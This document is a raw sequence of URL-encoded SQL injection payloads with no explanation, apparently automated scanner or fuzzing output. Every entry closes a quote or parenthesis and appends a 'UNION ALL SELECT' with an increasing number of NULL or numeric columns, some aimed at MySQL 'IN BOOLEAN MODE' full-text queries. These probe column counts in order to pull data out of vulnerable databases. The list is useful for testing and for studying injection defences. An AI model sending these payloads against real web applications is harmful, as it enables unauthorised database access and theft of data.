-9190%27%20%2B%20%28SELECT%20%27mFJw%27%20WHERE%208248%3D8248%20UNION%20ALL%20SELECT%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248%2C%208248--%20%20%29%20%2B%20%27 -4023%27%20%2B%20%28SELECT%20%27YAdG%27%20WHERE%208650%3D8650%20UNION%20ALL%20SELECT%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650%2C%208650--%20%20%29%20%2B%20%27 -9120%27%20%2B%20%28SELECT%20%27TkZI%27%20WHERE%208265%3D8265%20UNION%20ALL%20SELECT%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265%2C%208265--%20%20%29%20%2B%20%27 -2775%27%20%2B%20%28SELECT%20%27eWCN%27%20WHERE%205243%3D5243%20UNION%20ALL%20SELECT%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243%2C%205243--%20%20%29%20%2B%20%27 -5482%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086%2C%207086--%20%20%23 -6138%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709--%20%20%23 -2472%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028%2C%206028--%20%20%23 -3305%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897%2C%202897--%20%20%23 -3424%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381%2C%204381--%20%20%23 -1237%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899--%20%20%23 -6404%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610%2C%208610--%20%20%23 -3871%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791%2C%209791--%20%20%23 -1930%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409%2C%202409--%20%20%23 -5155%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051--%20%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 